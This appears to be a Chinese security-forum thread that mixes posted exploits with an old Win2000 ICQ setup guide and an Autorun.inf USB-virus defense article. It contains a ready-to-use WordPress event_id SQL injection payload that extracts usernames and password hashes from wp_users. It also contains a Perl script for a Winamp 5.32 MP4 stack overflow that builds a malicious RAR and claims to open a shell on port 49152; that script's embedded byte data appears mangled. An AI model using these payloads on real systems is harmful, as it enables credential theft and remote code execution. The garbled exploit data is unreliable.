最近看过此主题的会员

返回列表 发帖
WordPress最新event_id注入漏洞
新鲜的wordpress注入漏洞

===[ Exploit ]===
www.sitedir.com.cn/?event_id=[Sql]
www.sitedir.com.cn/Path/?event_id=[Sql]
Exploit:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Win2000服务器设置全攻略(七)
前言 注意:1/2)本文限在局域网中;2/2)本文未特定指出处,均使用其默认选项。 七、ICQ Groupware(2/3) 4、也可直接在服务器端申请 1/3)运行ICQ Groupware Server 2/3)User Management→New→修改常用信息→去掉Send Registration Notice By...前的勾→OK/ADD;如此反复,直到申请了够用的号码,再按Done退出。如下图:  3/3)已申请的号码可选User Management→Start Search察看。如下图:  5、客户端登录 1/5)输入服务器名,ICQ号码,密码(默认为“大写的”:ICQ),再按Login登录。如下图:  2/5)登录成功。如下图:
<P align=left>[/quote]
<P align=left> 3/5)改登录密码。如下图:  4/5)确定→Cancel(可不用改个人信息) 5/5)出现ICQ的主画面。如下图: [/quote]
<P align=left>[/quote]
<P align=left> [/quote]


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

不错不错.,..我喜欢


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Nullsoft Winamp 5.32 MP4 标签堆栈溢出利用
#!/bin/perl## Nullsoft Winamp MP4 tags Stack Overflow # # 0-day discovered and exploited by SYS 49152# # Tested on win XP SP2 ENG# Tuned for Nullsoft Winamp 5.32 d.i.# Shell on port 49152# # usage:# well, not much fun for you kids here ..# to get the shell you have to use ALT+3 and press UPDATE. # Instead this one is VERY interesting for the exploiters around..# this is an unicode sploit where in addition about half# of the 0x0-0xff range can't be used..# I'm quite curious to see if someone understands how I did..# if this is the case drop me a mail with the magic word# to gforce(put the @ here)operamail(put the . here)com# # btw # due to some complaints by some kids that were having serious# problems in using winzip, this time I tried with winrar :-)###update:#the latest 5.5 seems patched.#the winamp version 5.32 reflects the date when I last updated #this code, 'cause I exploited this one more than an year ago.#I see that marsu exploited the same bug about six months ago,#when I did the big mistake to show this one to some "friends"..#I'm sure that marsu can even give the details on how this bug works :-)# begin binary data:my $rar_data = # code 724983"x52x61x72x21x1Ax07x00xCFx90x73x00x00x0Dx00x00"."x00x00x00x00x00xBFx95x74x20x80x3Cx00x5Ax04x00"."x00x70x09x00x00x02x0Bx7CxFBx08xB3xB0x24x36x1D"."x33x1Cx00x20x00x00x00x53x59x53x5Fx34x39x31x35"."x32x5Fx4Dx50x34x5Fx66x6Fx72x5Fx77x69x6Ex61x6D"."x70x2Ex6Dx70x34x0Cx1Dx51x10x8Dx0FxCDx81x1Cx8A"."x25xAEx74x6Cx6Cx18xC6xDEx86xF5x9Cx64xDDx9BxB3"."x66xF3x93x84xE7x14xE1xBBx3Ex0Ax4Ex31x1AxDExC8"."xC4xD9xADxA7xA4x73xA8x33xE0xD8x33xE4xF1x98xF4"."x6Dx90x0Cx03x03x00xD0x7Bx06x31x8FxE2x44xB5x4E"."x93x94xE1x22x51x45x03x0CxCCx30x18x66x7Fx0Bx16"."xE0x0Dx83xC1xD8x3Ex3BxBBx12x93xF8x0DxACxC5x79"."x77xEAxAAxF5x7Cx78x5Ex7Fx35x74xBDx75x5Ex55xF1"."xF5x2FxDExF5xDDx5DxDDx25x4AxF8xD2xBEx16x92x04"."x17xDFxB2xACxDCxDDx0Ex6Dx06x62xADx0CxACx93x92"."x0FxCExAFxCBxA1xCBxFDx19x08x10x7Bx25xA0xBAx9E"."xC5xEFx6BxF1xE9x70xFFx7CxFEx14x16x3Bx81xB6xFB"."xECxFBxF2x55xA8x07xDFxA5x57x80xE7x63x1Dx63xFD"."xCCxCFxB3xA5x59x2Ax73xD4x67x67x66x7Ax0Ex6FxBD"."xB5x39x9Ex25x60xD8x90x6Fx0Ax85x56x55xFEx4Ax85"."x6Ax3Dx08xABx6FxF8x67xABx3AxBFx8BxBBxF3x79xD4"."x66x77xCExA3xA9xDBx1Bx21x50x08xF5x3DxCAxF2xEF"."x7Dx5DxE4xFDx9ExE7x5FxB5xD8x4FxDDxF9xFEx4Fx8F"."xEBx4FxD6x4Fx56x08xC6x0AxBAxB0xBBx75xA1xC8x1D"."xCExE1x32x77x29x36x5BxFCx04x58xCDx8Bx68xCCxD9"."x51x8Dx08x41xC2xDFx21xE3xFEx47xB2x0Dx75x2Cx7E"."x09xA5x78xD6x95x10x42x38x56xD5xD6xDFx9Fx3Bx74"."x8Ex2Ex32xD8x42x25xDBx22x75x96xDBx41x48x6AxFE"."x94x56xB3xE3xADxA5x3Ax25x36xACxEAxC5x8Bx4Ax6B"."x32xF9xD9xFDx2Cx2Fx6Fx48xD9xAFxE8x44xE2x1Dx9C"."x8Ax9Ex49x57x99x08x57x95xF9x0CxDAx97xA4xB4x96"."x4ExCCx63xA8x56x9Bx03xF6x3DxE1xA2x95x20x33xC0"."x60x54xD7x33xF7x6DxEBx13xFFx64xC6x94x45xA6x34"."xD8x23x99xA0xB2xE3x41x58x16xE9x92x30xB4xE0x4D"."x26x1Cx71xDDxBExA2x24xDAx30xA4x51xB5xA8x0CxEE"."xB0xD2xCBx75x72xC7x70xE8x6Fx71x56xF2xCBxAAxF1"."xD9xF2xC9xA8xDBx4Ax78x9Ax3Dx10x84x68x7Ax63xEC"."x87xFAx84x63x79x46xEBxBCxA1x31xC1xE0x3BxA1x2D"."xD7x32xCBxCExC0x0Fx40x2Cx9Ex33x3Bx4DxF1x91xD7"."x0FxB0x11xF6xC8x2Ex16xE8x1Ax47x08xE2x46xC7x23"."x00x8Ax65xB0x63x61x39x68x36x47x24xC2xDAxE9x07"."xFBx80x43x46x97x40x1Bx6AxE0x3AxBCxEEx7Bx5Ax60"."x66x4Cx10xB7xF3x89x99x28x13x38x01x1Ex00x65x70"."x3Ex01xA2x9Ex8Dx52x43x72x63x5Ax0Fx1Ex96xD5x89"."xECx3Fx2DxBBx6Ex8Bx60x9Bx09x9Fx26x8Fx41x8Fx74"."xE7xCAxDExA6x28xB4x75x75x2Ax31xFCx8Cx0FxC9x4A"."x00x86xCCxDExB9xBExD5xC5xE5x02x8ExA1x09xE1x32"."x7Cx74x38xB5xE7xC9x7Cx0Dx6Dx37xB4xF8x26xD4x7A"."x21x16x85xC3x97xDEx85xBExA5x0Ex68x28xAAx02xB5"."x04xF6x3Cx6Dx10x3BxDCx6Fx58x13x41x6Bx86x05xDC"."xB4xDDx1AxEBx68x8Ex00xE7xC5x66x87x1Dx37x57x09"."x0Ax1Cx6Cx4Cx14x98xF8x69x79x84xB8xB7x7Cx46x93"."x0Dx0DxB7xC5xC1xC0x46x99x36x1Ax2Cx2Cx2Ex67x1D"."x1Ax2Cx54x56x92x14x58x16x5Ax34xB7xF8x1DxFFx5F"."x90xEFx25xEBxCDx5CxC0x05xF1x7Ex8Dx22x5Cx7Cx7C"."x4BxF4x58xDDx54x58x37x70x04x69x53x58x58x38x77"."x55xA4x06x0Ex4Dx8Cx93x07x1Bx09x1Fx4Ex1Ex43xD2"."xECx9AxDCxA5xBFxC2x44x9AxBEx6Ex86x9FxEDxF5xF9"."x0ExB1xEExF5xFBx1ExF7x67xB5xEFxF6xFEx0ExE7xFE"."x6DxC8xAFx2CxA3xAFx7Fx31xA9xE8xB8x49xE6x7Cx54"."x91x8Dx9Dx32x9AxE9xD6x66xA7xD2x87x8Cx8ExC7x39"."x4Ex5Ex55x8FxCAxB7x43x05x3Fx17xCCxB0x96xA2x98"."xC5x91x42x3AxA1x16x0Dx57x9Bx66xF1x6Bx95x18x32"."x57xB8xB4x1Dx15x01xC5x4DxD8x26x41x90x01x09x6E"."x1Fx48x24x43x84x40xACx4Ex6BxB9xCCxE7x5AxC2xA6"."xDDxC1x8Fx22x55x77x34x97x93x6Bx6CxCExAExF6x5C"."x14xE6x28x0Dx15x2Ex01x81xB2x25x6Cx51xE1x3Bx2E"."x1Bx43xD9x86x5Cx25xF4x74x84x35xBAxC3x77xECx92"."xF4x48xD4xE3xA6xD2x38x3AxB3x52x3ExF5x49x11xA9"."x32x89xC8xDFx8CxDEx10xC8x73x2Cx05x47xA1xB2x4B"."x0Dx5Ex59xCFxE9x14x1Ax57x1Dx02x7FxD4x97x13xF7"."x77x70xD6xD7xA1x31x68xBDx9Cx00xC9xFCx75x0Bx6F"."xC2x50x4BxEFx09xAAx09x9CxB8xDBx64xF0xAFx38x08"."xD9xC1xD3x5Dx6Bx30x16xB4x68xC5xC7xD2x2Ex4CxAB"."x75xCExC5x81x0ExBBx7Ex83x2DxC3x35x16x10xD1x79"."x63x2Ex1DxC2xE9xEFx9Bx96x0Ax52xF5xA4x35x5Cx63"."xD8xC6x1Ex55xEExF8x7DxDEx0Fx09xD4x20x4ExAFx3F"."x2ExE8xE9x0Ex8Fx55x13xE4xA9xF1x65xFFxC2xF4xAA"."xD5x67x66x9Cx90x9Dx08x8ExDEx26x46x72x9BxBFx97"."x18x1ExAAx9Fx69x50x01xFFx10xC4x3Dx7Bx00x40x07"."x00";# size = 1201 bytesopen(code, ">unrarme.rar") || die "Can't Write temporary File
";binmode (code);print code $rar_data;close (code);print "
File ready, have fun..
";exp.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

对Autorun.inf类U盘病毒的攻防经验总结
“RavMonE.exe"、"rose.exe"、"sxs.exe"、"copy.exe"、"setup.exe"...根目录下的神秘幽灵,系统安全的杀手,它们被称作“U盘病毒”。无数Windows用户,都在为它们而焦头烂额。这一篇文章是一篇对自己对U盘病毒的研究和与U盘病毒斗争的经验教训的总结。
Windows 95以后的系统都有一个“自动运行”的功能。通过在卷插入时读取磁盘卷上的Autorun.inf文件来获得Explorer中卷的自定义图标和对卷图标的上下文菜单进行修改,并对某些媒体自动运行Autorun.inf中定义的可执行文件。05年以后,随着各种可移动存储设备的普及,国内有些黑客制作了盗取U盘内容并将自身复制到U盘利用Autorun.inf传播的病毒。著名的伪ravmon、copy+host、sxs、Viking、熊猫烧香等著名病毒都有这种传播方式。它们有时是根目录下的神秘幽灵,有时是出现在不应该出现的地方的回收站,总之,它们是系统安全的严重威胁。
Autorun.inf被病毒利用一般有4种方式:
1.OPEN=filename.exe 自动运行。但是对于很多XPSP2用户和Vista用户,Autorun已经变成了AutoPlay,不会自动运行它,会弹出窗口说要你干什么。
2. shellAutocommand=filename.exeshell=Auto修改上下文菜单。把默认项改为病毒的启动项。但此时只要用户在图标上点击右键,马上发现破绽。精明点的病毒会改默认项的名字,但如果你在非中文的系统下发现右键菜单里多出了乱码或者中文,你会认为是什么呢?
3.shellexecute=filename.exe ShellExecute=....只要调用ShellExecuteA/W函数试图打开U盘根目录,病毒就会自动运行。这种是对付那些用Win+R输盘符开盘的人。
4.shellopen=打开(&amp;O)shellopenCommand=filename.EXEshellopenDefault=1shellexplore=资源管理器(&amp;X)
这种迷惑性较大,是新出现的一种形式。右键菜单一眼也看不出问题,但是在非中文的系统下,原形毕露。突然出现的乱码、中文当然难逃法眼。面对这种危险,尤其是第四种,仅仅依靠Explorer本身,已经很难判断可移动磁盘是否已经中毒。而在这种情况下,一部分人也根据自己的经验,做出了“免疫”工具。
免疫的办法,对可移动磁盘和硬盘:
1、同名目录
目录在Windows下是一种特殊的文件,而两个同一目录下的文件不能同名。于是,新建一个目录“autorun.inf"在可移动磁盘的根目录,可以防止早期未考虑这种情况存在的病毒创建autorun.inf,减少传播成功的概率。
2、autorun.inf下的非法文件名目录
有些病毒加入了容错处理代码,在生成autorun.inf之前先试图删除autorun.inf目录。在Windows NT Win32子系统下,诸如"filename."这样的目录名是允许存在的,但是为了保持和DOS/Win9x的8.3文件系统的兼容性(.后为空非法),直接调用标准Win32 API中的目录查询函数是无法查询这类目录中的内容的,会返回错误。但是,删除目录必须要逐级删除其下的整个树形结构,因此必须查询其下每个子目录的内容。因此,在“autorun.inf"目录建一个此类特殊目录,方法如"MD x:autorun.infyksoft..",可以防止autorun.inf目录轻易被删除。类似的还有利用Native API创建使用DOS保留名的目录(如con、lpt1、prn等)也能达到相似的目的。
3、NTFS权限控制
病毒制造者也是黑客,知道Windows的这几个可算是Bug的功能。他们可以做一个程序,扫描目录时发现某目录名最后一个字节为'.'则通过访问"dirfullname.."、或者通过利用Windows NT的Native API中的文件系统函数直接插手,删除该特殊目录。
因此,基于更低层的文件系统权限控制的办法出现了。将U盘、移动硬盘格式化为NTFS文件系统,创建Autorun.inf目录,设置该目录对任何用户都没有任何权限,病毒不仅无法删除,甚至无法列出该目录内容。
但是,该办法不适合于音乐播放器之类通常不支持NTFS的设备。
这三步可谓是一步比一步精彩。但是,最大的问题不在怎么防止生成这个autorun.inf上,而是系统本身、Explorer的脆弱性。病毒作者很快就会做出更强大的方案。这是我的预想。
1、结合ANI漏洞,在autorun.inf里将icon设成一个ANI漏洞的Exploit文件(经过我的实验,发现Windows有一种特性,就算把ani扩展名改为ico,还是可以解析出图标),这样只要一打开“我的电脑”,未打补丁、无杀软的系统就会直接遭殃。这样的东西还可以放到网上的各种资源ISO中。
2、提高病毒的整体编程水平,综合以上各种反免疫方式,另外利用多数国内windows用户常以高权限登录系统的特点,自动将没有权限的Autorun.inf目录获得所有权、加读写删除权限,击破这最坚固的堡垒。
面对如此恐怖的东西,对付的办法已经不多了。但是它们其实是一切windows安全问题的基本解决方案,
1、一定要将系统和安全软件保持在最新状态。即使是盗版用户,微软也不会不给重要级别的安全更新,也从来没有过在重要级别安全更新中加入反盗版程序的记录。
2、尽量以受限制的帐户使用系统和上网,这样可以减少病毒进入系统的概率。Vista之所以加入UAC功能,正是因为它能够使用户在尽量方便的同时,享受到受限用户的安全。
3、某种程度上,可以说QQ、IE和某些装备能换真钱、什么都要真钱的网游是导致大量病毒木马编写者出现的“万恶之源”。通过IE漏洞,制作网页木马,安装盗号程序,盗取账号,获得人民币。这条黑色产业链中,IE其实是最容易剪断的一环。珍爱系统,系统一定要更新,要有能防止网页木马的杀毒软件,用IE不要乱上各种小型下载站、色情网站等高危站点,如果有可能,使用非IE引擎的浏览器。
4、恶意捆绑软件,现在越来越和病毒木马接近。部分恶意软件的FSD HOOK自我防御程序可能被病毒利用来保护自己(如SONY XCP事件),而一些恶意软件本身就是一个病毒木马的下载器。因此,不要让流氓接近你的机器。
Autorun.inf的攻防战还在继续,只会变得越来越精彩,网民的安全意识会在攻与防的对立与统一中获得突破性的进展。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表